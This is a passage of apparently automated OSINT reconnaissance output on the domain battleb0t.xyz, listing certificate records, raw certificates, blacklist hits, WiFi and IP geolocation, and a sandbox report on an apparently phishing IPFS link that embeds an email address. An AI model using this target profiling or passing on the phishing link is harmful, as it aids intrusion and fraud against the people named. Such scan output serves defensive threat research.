Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:00:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.22): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.135): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:7a:cf:72:75:e0:23:b5:24:56:0b:ff:81:dc:
d9:ef:b9:84:a5:cb:15:5a:f2:4d:f6:46:6d:b0:47:
aa:99:c5:97:75:9e:1e:5a:4f:3a:12:c1:33:26:f0:
0f:b9:47:15:ee:28:b3:c5:a0:0e:6e:82:c2:e4:9e:
2f:89:8d:b1:98:56:ae:4e:51:dc:76:c6:4d:f7:a0:
da:11:9a:d1:d4:0e:53:d9:8e:4c:35:dc:f0:9d:a8:
b5:1d:3f:0a:c6:d4:12:00:be:6b:8b:db:1c:eb:ff:
fa:8a:0d:30:cf:48:30:73:35:bc:e5:39:78:d6:97:
a1:00:9f:88:3e:2a:d4:35:22:13:80:4e:57:e4:0b:
6b:33:da:ae:7f:1b:ed:8f:82:10:4f:76:18:82:03:
22:e6:2a:88:53:b9:9a:80:d1:10:21:d7:25:be:5d:
9e:dd:23:0e:2f:8b:44:b5:d9:a6:ea:9a:ef:d4:ac:
24:ea:27:de:5f:35:74:c4:ee:db:95:49:53:28:21:
da:c7:71:d0:ef:75:13:d9:75:8b:84:42:b8:62:af:
7a:1c:85:43:b6:85:1f:19:fe:11:de:22:13:41:a7:
26:69:56:b7:56:8c:31:f6:46:81:6d:dd:94:ae:81:
bb:82:f2:fb:15:03:15:a0:92:6d:46:ee:3b:be:82:
d4:cc:f6:b8:f0:82:0e:be:9c:1b:d5:a9:e7:74:12:
18:51:f1:a4:d7:96:be:07:63:2a:5b:b2:de:3e:8d:
99:72:fa:17:ce:36:64:cf:aa:ef:2b:4c:60:46:d0:
cb:1a:9e:bb:94:71:19:32:32:aa:a0:4f:7c:b5:80:
d2:ac:29:a1:3e:79:7a:46:f9:fc:2c:b9:f9:8b:cb:
59:c4:7c:ae:87:57:d8:e5:12:0a:0b:a5:34:e8:72:
2f:e5:15:84:33:1d:01:b8:f5:d1:2b:ff:10:f9:e7:
ef:0c:be:61:fe:87:b7:d8:4f:dc:f0:08:3e:e4:ba:
53:2e:94:64:aa:29:45:65:cb:b5:3b:5d:cd:a7:33:
69:f9:c8:07:c0:c9:87:da:c3:82:4b:50:90:d2:80:
18:a8:e3:89:70:e0:61:b8:c9:4f:82:66:2b:0e:23:
36:49:33:34:63:e7:8a:70:61:f2:a3:6d:68:5c:13:
84:18:1d:5c:05:3c:2b:f0:28:3d:ae:ff:ba:af:c4:
48:bb:d7:f2:a8:15:4b:68:f4:b5:9d:7c:d4:31:43:
bf:01:12:bc:59:5f:ef:ce:fb:0e:78:b7:62:51:52:
0f:d1:8e:d7:11:fa:d7:0c:57:e7:ee:bd:a5:16:b1:
30:a1:96:90:5b:b4:a4:e1:b1:72:88:e0:56:6f:9c:
5b:43:b9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a0:b0:46:e1:61:f3:0f:d5:bd:4b:02:c1:d6:75:b9:f8:08:3f:
64:70:3e:0a:8e:05:b2:6a:d5:2d:f4:c2:44:2e:a1:69:fc:5f:
a9:1c:d9:a6:04:60:12:75:b1:76:52:fb:f1:ff:75:9e:04:19:
67:aa:4f:00:aa:4d:57:a4:a3:68:1c:aa:cb:35:1d:41:8c:dc:
11:dd:f7:90:a2:ae:7c:e8:50:6f:3b:c0:1b:42:7c:1c:15:9c:
91:57:04:35:95:16:bb:4c:ff:22:e0:0c:44:a1:11:6c:76:07:
39:1f:59:4c:5d:c4:6b:b6:12:26:1e:1d:32:67:40:25:44:dc:
e3:1a:dc:31:b4:f1:92:10:ce:d6:3c:cd:02:c8:22:d7:81:50:
ea:ac:04:3b:1f:4b:51:ae:33:f4:24:8b:7f:2e:d9:ff:38:ef:
db:4c:3c:9b:ec:f5:3c:20:af:9a:a6:6e:49:52:0d:57:8a:fe:
12:8f:6b:6e:14:14:d7:22:a3:1b:92:9c:e8:00:cd:fb:2f:a9:
04:b2:c9:5f:ce:7b:7e:43:9a:5c:9d:bc:db:c0:27:6e:61:a2:
00:b8:76:ec:1b:e2:30:04:0a:2e:39:6e:d4:82:d8:1e:28:94:
6b:51:10:7b:2b:3f:22:2b:a5:a4:34:1d:1e:d0:b6:84:c0:7c:
de:7e:13:7e
|
| 2023-05-12 02:44:24 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | draadloos (Net ID: 00:01:E3:4A:CD:74) | 52.3759, 4.8975 |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jloup@gzip.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "m_el_main_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_D809339D-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D809339B-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "X2WYMCV5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X2WYMCV5.txt]- [targetUID: 00000000-00002768]\n "DEW9N13E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEW9N13E.txt]- [targetUID: 00000000-00003116]\n "_E2C1FED7-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1NX8I2I6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NX8I2I6.txt]- [targetUID: 00000000-00002768]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "UX69Y2OK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UX69Y2OK.txt]- [targetUID: 00000000-00003116]\n "BQ7YREAH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BQ7YREAH.txt]- [targetUID: 00000000-00003116]\n "~DF7ADEEE89A7F7CB7A.TMP" has type "data"- Location: [%TEMP%\\~DF7ADEEE89A7F7CB7A.TMP]- [targetUID: 00000000-00002768]\n "C1BNT20A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1BNT20A.txt]- [targetUID: 00000000-00002768]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "m_navigationui_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002768]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.google.com/support/translate+(en==Hn?:#googtrans/en/+Hn);var"\n Pattern match: "https://www.google.com/tools/feedback},Tw=function(a){return"\n Pattern match: "https://github.com/madler/zlib/blob/master/zlib.h"\n Pattern match: "https://www.google.com/images/cleardot.gif"\n Pattern match: "https://==Pn?V.Gh:null};this.Z={qb:Un,xd:null};a&&"\n Pattern match: "V.Pb/\ufffd\u0331"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "https://www&google.com/images/zippy_minus_sm.gif"\n Pattern match: "http://www.w3.org/TR/selectors/#attribute-selectors"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#attribute-selectors"\n Pattern match: "https://developer.mozilla.org/en/Security/CSP"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#escaped-characters"\n Pattern match: "http://bugs.jquery.com/ticket/12282#comment:15"\n Pattern match: "http://blindsignals.com/index.php/2009/07/jquery-delay/"\n Pattern match: "http://bugs.jquery.com/ticket/12359"\n Pattern match: "http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291"\n Pattern match: "http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/"\n Pattern match: "http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)"\n Pattern match: "http://javascript.nwbox.com/IEContentLoaded/"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx"\n Pattern match: "http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context"\n Pattern match: "http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html"\n Pattern match: "http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked"\n Pattern match: "http://www.w3.org/TR/css3-syntax/#characters"\n Pattern match: "http://www.w3.org/TR/selectors/#empty-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#lang-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#pseudo-classes"\n Pattern match: "https://github.com/jquery/jquery/pull/764"\n Pattern match: "http://json.org/json2.js"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=491668"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier"\n Pattern match: "https://developer.mozilla.org/en-US/docs/CSS/display"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=649285"\n Pattern match: "http://dev.w3.org/csswg/cssom/#resolved-values"\n Pattern match: "http://jsperf.com/getall-vs-sizzle/2"\n Pattern match: "https://bugs.webkit.org/show_bug.cgi?id=29084"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#whitespace"\n Pattern match: "https://bafybeia3mpocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a.ipfs.dweb.link/"\n Pattern match: "https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-US&client=wt"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/exm=corsproxy/ed=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=navigationui"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=corsproxy"\n Pattern match: "https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog\\]]],null,null,null,null,null,null,-3600,null,null,null,null,[],1,nu |
| 2023-05-12 03:11:20 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 165.232.113.85 |
| 2023-05-12 02:57:24 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:47:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:23:1a:4a:59:35:02:c1:c6:ee:ce:b0:90:2b:32:ff:c3:73:
00:60:2e:9e:f9:30:da:4e:15:e2:5a:99:e8:dc:18:9e:39:ed:
69:f1:83:a4:0a:04:28:db:64:81:bf:64:61:e9:65:9c:4b:bf:
43:b4:21:89:ab:e2:5c:b4:ea:8e:55:b3:f4:e4:d9:42:3e:20:
e0:83:2a:75:f9:b5:2c:98:6f:90:e7:e4:4a:86:e5:ab:f3:97:
c8:a9:85:ff:6a:e9:35:8d:3d:30:f6:db:5e:e0:f1:27:f3:d3:
e7:f7:29:be:31:75:49:43:f6:99:93:6d:06:65:d1:3e:4c:29:
66:fd:2f:93:e9:c6:ec:30:8a:f2:58:08:03:45:02:a0:57:b1:
3b:0b:b4:a9:ed:aa:8b:9f:ac:43:5a:55:10:bb:1e:31:d5:e4:
c1:37:cd:22:a3:bd:26:b6:f1:01:e1:68:e2:c6:50:80:44:4b:
cd:a0:4a:80:cc:93:e4:1b:7e:d7:af:21:2c:ce:f2:c1:d0:70:
17:ad:3a:29:15:d4:b9:ee:11:c8:aa:7f:fa:b4:9a:33:05:ef:
47:de:10:55:c2:f1:9f:19:e4:ad:0a:83:ff:a1:86:3d:18:bd:
